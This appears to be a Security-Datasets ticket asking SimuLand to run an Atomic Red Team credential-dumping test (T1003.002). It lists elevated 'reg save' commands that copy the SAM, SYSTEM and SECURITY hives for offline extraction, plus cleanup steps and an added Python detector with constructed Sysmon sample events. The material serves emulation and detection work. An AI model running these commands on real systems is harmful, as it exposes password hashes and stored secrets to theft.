Security-Datasets
[SD-ART-T1003.002-01] Registry dump of SAM, creds, and secrets - SimuLand Request
Source: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Atomic Test #1 - Registry dump of SAM, creds, and secrets
The local SAM (SAM & System hives), cached credentials (System & Security hives) and LSA secrets (System & Security hives) can be enumerated via three registry keys, and the saved hives can then be processed offline with https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named sam, system and security in the %temp% directory.
Supported Platforms: Windows
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
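From the detection side, the three commands above leave a clear mark in process-creation telemetry: reg.exe invoked with the save (or export) verb against a whole HKLM\SAM, HKLM\SECURITY or HKLM\SYSTEM hive. The following Python helper is an added example written for this page; it is not code from Security-Datasets, Atomic Red Team or SimuLand. It assumes Sysmon Event ID 1 style records (Hostname, User, Image, CommandLine) serialized one JSON object per line, the shape Security-Datasets exports, and the sample events embedded in it are constructed, not real telemetry.

```python
"""Flag process-creation events where reg.exe saves a full credential hive.

Hypothetical detection helper written for this page (not Atomic Red Team or
SimuLand code). Assumes Sysmon Event ID 1 style records serialized as JSON
lines with Hostname, User, Image and CommandLine fields.
"""
import json
import re

# Matches:  reg save HKLM\sam <out>
#           "C:\...\reg.exe" export "HKEY_LOCAL_MACHINE\SECURITY" <out>
# but not:  reg save HKLM\system\CurrentControlSet\... (a sub-key save is
#           routine administration; the full hive is what yields credentials)
_HIVE_SAVE = re.compile(
    r'''^\s*"?(?:[^"\s]*\\)?reg(?:\.exe)?"?\s+'''          # reg or full path to reg.exe
    r'''(?P<verb>save|export)\s+'''                        # verbs that write a hive to disk
    r'''"?(?:hklm|hkey_local_machine)\\'''                 # HKLM root, short or long form
    r'''(?P<hive>sam|security|system)\\?"?(?=\s|$)''',     # whole hive, nothing after it
    re.IGNORECASE,
)


def hive_dump_target(command_line: str):
    """Return 'sam', 'security' or 'system' when the command line saves a
    whole credential hive to disk, otherwise None."""
    m = _HIVE_SAVE.match(command_line or "")
    return m.group("hive").lower() if m else None


def scan_events(jsonl: str):
    """Scan JSON-lines process-creation events and return one finding per
    hive dump, tagged with the ATT&CK sub-technique this test maps to."""
    findings = []
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("EventID") != 1:          # only process creation carries a command line
            continue
        hive = hive_dump_target(ev.get("CommandLine", ""))
        if hive:
            findings.append({
                "host": ev.get("Hostname"),
                "user": ev.get("User"),
                "image": ev.get("Image"),
                "hive": hive,
                "command": ev.get("CommandLine"),
                "technique": "T1003.002",
            })
    return findings


# Constructed sample events: the three test commands (with the %temp% path
# expanded, quoted and long-form variants), two benign reg.exe uses, one
# unrelated process and one non-process event that must be skipped.
SAMPLE_EVENTS = r'''
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg save HKLM\\sam C:\\Users\\admin\\AppData\\Local\\Temp\\sam"}
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg.exe save \"HKEY_LOCAL_MACHINE\\SECURITY\" C:\\Users\\Public\\security"}
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\admin", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "\"C:\\Windows\\System32\\reg.exe\" save hklm\\system C:\\Windows\\Temp\\system"}
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\svc_backup", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg save HKLM\\SYSTEM\\CurrentControlSet\\Services\\Spooler C:\\backup\\spooler.hiv"}
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\helpdesk", "Image": "C:\\Windows\\System32\\reg.exe", "CommandLine": "reg query HKLM\\SYSTEM\\CurrentControlSet\\Control"}
{"EventID": 1, "Hostname": "WKS01", "User": "CORP\\user1", "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe C:\\notes.txt"}
{"EventID": 3, "Hostname": "WKS01", "User": "CORP\\user1", "Image": "C:\\Windows\\System32\\svchost.exe", "DestinationIp": "10.0.0.5"}
'''

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"{f['host']} {f['user']}: {f['hive'].upper()} hive saved -> {f['command']}")
```

The pattern deliberately stops at the hive name so that saves of sub-keys such as HKLM\SYSTEM\CurrentControlSet are not flagged; that keeps the rule narrow enough to run as a high-confidence alert rather than a hunting query. Pairing it with the cleanup commands above (a del of the same three file names in %temp%) would be the natural follow-on check once the SimuLand environment has produced the dataset.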
Tasks:
- Create an issue in the SimuLand GitHub repo with a request to run this atomic test
- Start collaborating with SimuLand contributors and make sure someone is assigned to creating the environment.
- Close this ticket and move it to done once the issue is created in the other project and someone is assigned to it.